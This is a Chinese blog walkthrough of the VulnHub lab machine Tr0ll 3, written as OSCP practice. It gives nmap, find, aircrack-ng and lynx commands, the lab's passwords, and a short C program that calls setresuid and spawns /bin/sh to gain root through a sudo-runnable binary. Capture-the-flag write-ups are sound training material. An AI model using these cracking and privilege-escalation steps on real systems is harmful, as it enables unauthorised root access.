OSCP练习:vulhub靶机TR0LL 3攻略

已于 2022-10-25 14:53:19 修改
阅读量395 收藏 1
点赞数 1
分类专栏: OSCP练习 文章标签: 服务器 安全 web安全 靶机 渗透测试
于 2022-10-25 14:52:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/127513197
版权

nmap -sC -sV 192.168.210.211
发现22端口
在这里插入图片描述

登录ssh 账密:start here (下载页面及登录页面提示)
在这里插入图片描述

发现一个网址
在这里插入图片描述

看起来没啥用
在这里插入图片描述

发现第二个账号密码,
step2:Password1! 登不上去没啥用
在这里插入图片描述

find / -type f -perm 0777 2>/dev/null find一下又执行权限的文件
发现一个cap包和一个txt
在这里插入图片描述

txt文件长得像一个字典
在这里插入图片描述

把cap包和txt下载到kali,并打开cap包查看内容

wireshark wytshadow.cap
在这里插入图片描述
发现协议都为802.11 判定为wifi流量包

使用aircrack-ng工具和获取到的字典w gold_star.txt 来爆破流量包
aircrack-ng -w gold_star.txt wytshadow.cap
在这里插入图片描述

获得密码:gaUoCe34t1
尝试使用 wytshadow:gaUoCe34t1登录
家目录下发现一个可执行文件权限为4777
在这里插入图片描述

执行后发现一直输出:iM Cr@zY L1k3 AAA LYNX
在这里插入图片描述

LYNX是一个 纯文本网页浏览器工具
sudo -l 发现本用户有启动nginx权限
在这里插入图片描述

查看nginx配置文件
在这里插入图片描述

发现nginx端口为8080,且只有ua为Lynx能够访问
在这里插入图片描述

sudo /usr/sbin/service nginx start 启动nginx
在这里插入图片描述

lynx http://192.168.210.211:8080
得到账密genphlux:HF9nd0cR!
在这里插入图片描述

成功登录
在这里插入图片描述

发现两个文件maleus xlogin
在这里插入图片描述

发现maleus为私钥,尝试ssh私钥登录
在这里插入图片描述

下载私钥到kali,更改私钥权限为600
登录成功
!在这里插入图片描述

查看.viminfo文件,发现密码B^slc8I$
在这里插入图片描述

查看sudo权限,发现dont_even_bother文件可执行且sudo执行有root用户权限
在这里插入图片描述

但原程序执行结果没什么用
在这里插入图片描述

将代码写入新文件dont_even_bother.c
int main (void){
setresuid(0,0,0);
system(“/bin/sh”);
}
编译程序gcc dont_even_bother.c -o dont_even_bother
在这里插入图片描述

执行程序,提权成功,拿到flag
在这里插入图片描述

**在这里插入图片描述**

Forest深林
关注
专栏目录
CTF之Tr0ll3 靶机渗透(用户信息泄露:登录 文件 ssh私钥)
afei001
07-22 472
     练习环境     攻击机:kali     靶机Tr0ll: 3     下载地址:https://download.vulnhub.com/tr0ll/Tr0ll3.ova      1.发现靶机,端口探测 root@kali:~# nmap -sP 192.168.1.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 08:01 EDT Nmap scan report for 192.168.1.1 (192.168..
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 729
secret.txt获得ssh私钥,suid提权
vulnhub靶场Tr0ll3靶场
zzzzzzkeai的博客
11-27 170
vulnhub靶场--Tr0ll3靶场
[Vulnhub] Tr0ll3 aircrack-ng+lynx
07-13 324
Lynx是一款文本模式的网页浏览器。它最初由Thomas Dickey在1992年开发,旨在为没有图形界面的终端用户提供网页浏览功能。Lynx在Unix和Linux系统上尤其流行,因为它可以通过命令行界面快速浏览网页而不需要图形界面支持。通过重新编译来获取ROOT权限。
Tr0ll3 vulnhub靶场 (scp)
weixin_62621015的博客
03-13 209
Tr0ll3 vunlhub靶场个人通关笔记
vulhubTr0ll3
qq_38618396的博客
09-20 311
0x00 基本信息 下载 Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions fo
oscp——Tr0ll: 1
王嘟嘟的博客
03-12 353
# 0x00 目标资料 ## 链接 https://www.vulnhub.com/entry/tr0ll-1,100/ ## 难度推荐 5 - 思路 2 - Web80——UserShell 2 - UserShell——Rootshel 1 ## 环境搭建 - VM...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
oscp靶机教程
weixin_68723119的博客
08-13 407
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
OSCP:OSCP考试材料
05-01
【压缩包子文件的文件名称列表】"OSCP-master"可能是一个包含整个OSCP学习路径的资料库,通常这样的资源会包含练习环境配置指南、漏洞分析文档、渗透测试工具介绍、靶机复现教程等。"master"一词可能意味着这是一个...
Vulnhub靶机
weixin_43902100的博客
09-21 679
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
VulnHub靶机-SkyTower
Slow_的博客
02-26 778
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
Vulnhub靶机 Lampiao
菜浪马废的博客
04-28 554
找到登录页面 cms:drupal7 可以爆破用户名 先找一下漏洞试试 伐克 尝试了半天 发现版本是7.54 用了半天7.0-7.31的 找到mysql的账号 三个账号 没能解密任何一个 试一下ssh 失败了 root就在你眼前 就是没法提权的感觉 太酸爽了 有一个用户tiago ssh爆破 我*********他 密码是这个?????? 我********* $...
Vulnhub靶机-Zico2
最新发布
ergeLXT的博客
07-23 519
得到靶机IP:192.168.127.146。
OSCP练习vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4423
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
vulhub靶机--HACKSUDO Alien
m0_58595840的博客
01-19 250
vulhub渗透测试
【oscp系列-Tr0ll-1】靶机4
weixin_44807430的博客
01-16 542
知行合一
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4348
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值